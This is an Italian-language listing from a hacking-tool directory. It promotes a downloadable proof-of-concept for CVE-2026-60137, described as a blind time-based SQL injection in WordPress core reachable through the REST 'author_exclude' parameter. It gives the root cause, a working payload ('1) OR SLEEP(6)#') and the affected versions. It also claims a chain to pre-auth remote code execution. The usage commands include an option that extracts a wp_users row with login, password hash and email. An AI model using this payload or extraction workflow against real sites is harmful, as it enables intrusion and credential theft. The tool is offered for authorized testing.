Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-60137-WordPress-Core-SQL-Injection-PoC — Harness di verifica e proof-of-concept non distruttivo per CVE-2026-60137, una SQL injection cieca nel core di WordPress (`WP_Query::author__not_in`), raggiungibile tramite il parametro `author_exclude` dell'API REST. | Kitploit
Strumenti/GitHubGitHub/abdullahmaqbool22/cve-2026-60137-wordpress-core-sql-injection-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubabdullahmaqbool22/cve-2026-60137-wordpress-core-sql-injection-poc

CVE-2026-60137-WordPress-Core-SQL-Injection-PoC

Harness di verifica e proof-of-concept non distruttivo per CVE-2026-60137, una SQL injection cieca nel core di WordPress (`WP_Query::author__not_in`), raggiungibile tramite il parametro `author_exclude` dell'API REST.

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-60137 — PoC per SQL injection nel core di WordPress

Prova di concetto non distruttiva e strumento di verifica per CVE-2026-60137, una SQL injection cieca nel core di WordPress (WP_Query::author__not_in), raggiungibile tramite il parametro author_exclude dell'API REST.

Causa principale

WP_Query::get_posts() costruisce l'SQL concatenando in stringa la variabile di query author__not_in all'interno di:

root@kitploit:~
... AND {wpdb->posts}.post_author NOT IN ( <value> )

Il valore viene sanificato (absint per elemento) solo quando arriva come array. Se viene fornita una stringa scalare — il parametro REST author_exclude viene mappato internamente a — il controllo di sanificazione viene saltato e la stringa grezza finisce nella clausola , causando una SQL injection ().

author__not_in
is_array()
NOT IN (...)
CWE-89

Un payload della forma 1) OR SLEEP(6)# produce:

root@kitploit:~
post_author NOT IN ( 1) OR SLEEP(6)# )

che viene interpretato come post_author NOT IN (1) OR SLEEP(6) (la ) finale viene consumata dal commento #) — un oracolo cieco basato sul tempo, pulito e senza alcuna scrittura sul database.

Versioni affette / corrette

Versioni affette6.8.0 – 6.8.5, 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Versioni corrette6.8.6, 6.9.5, 7.0.2 (2026-07-17)
CVSS 3.1AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N → 5.9 (sink isolato)
Combinatacon CVE-2026-63030 (confusione di route REST batch) → 9.8 RCE pre-auth su 6.9.0 – 7.0.1

Note sulla raggiungibilità

  • 6.9.0+ — sink raggiungibile in pre-auth tramite la confusione di route /wp-json/batch/v1.
  • 6.8.x — lo schema REST rifiuta un author_exclude scalare (HTTP 400) sulla route posts predefinita, quindi il sink è tipicamente raggiungibile solo quando un plugin/tema inoltra input non attendibile, oppure tramite una sessione autenticata (--cookie) attraverso la route batch.

Cosa fa lo script

cve_2026_60137_poc.py è in sola lettura sul database:

  1. Rileva l'impronta del target (meta tag generator, feed, readme.html, indice /wp-json/) per verificare se la versione rientra in un intervallo affetto.
  2. Rileva l'iniezione con un oracolo basato sul tempo: baseline rispetto a un controllo di parsing SLEEP(0) e a un payload SLEEP(n), attraverso diversi vettori di consegna (route REST dirette, ?rest_route= e l'endpoint batch), e riporta un verdetto per ciascun vettore.
  3. Opzionalmente estrae una riga di wp_users (user_login, user_pass, user_email) tramite timing cieco a ricerca binaria, usando rigorosamente SELECT/SLEEP — non scrive mai sul database.

Uso

root@kitploit:~
# Fingerprint only, no payloads sent
python3 cve_2026_60137_poc.py --url https://target --safe

# Run the detection matrix
python3 cve_2026_60137_poc.py --url https://target --sleep 6 --samples 3

# Authenticated session + extract wp_users row 1
python3 cve_2026_60137_poc.py --url https://target \
    --cookie 'wordpress_logged_in_XXX=YYY' --extract --user-id 1

# Route through Burp, skip TLS verification, save machine-readable evidence
python3 cve_2026_60137_poc.py --url https://target \
    --proxy http://127.0.0.1:8080 --no-verify-tls --json-out evidence.json

Opzioni

FlagPredefinitoDescrizione
--urlobbligatorioURL di base del target
--safedisattivatoSolo impronta; non invia payload
--sleep6Secondi di SLEEP() usati dall'oracolo di rilevamento
--samples3Campioni di timing per misurazione (viene usata la mediana)
--threshold0.7Frazione di --sleep considerata un delta positivo
--extractdisattivatoEstrae una riga di wp_users tramite l'oracolo cieco
--user-id1wp_users.ID da estrarre
--extract-sleep2.0Secondi di SLEEP() per probe di estrazione
--limit64Numero massimo di caratteri per campo estratto
--only-vector—Testa solo i vettori il cui nome contiene questa stringa
--cookie—Cookie autenticato per i vettori protetti da autenticazione
--proxy—Proxy HTTP(S), ad es. http://127.0.0.1:8080 (Burp)
--timeout30Timeout delle richieste in secondi
--no-verify-tlsdisattivatoDisabilita la verifica dei certificati TLS
--json-out—Scrive le evidenze leggibili da macchina in un file JSON

Uso legale e responsabile

Questo strumento è fornito solo per test di sicurezza autorizzati — penetration test, CTF e ricerca su sistemi di tua proprietà o per i quali disponi di esplicita autorizzazione scritta a effettuare valutazioni. Eseguirlo su sistemi senza autorizzazione è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

Qualsiasi output scritto con --json-out può contenere l'URL testato, l'impronta di versione ed evidenze temporali — trattalo come dato sensibile dell'engagement.

Scarica lo strumento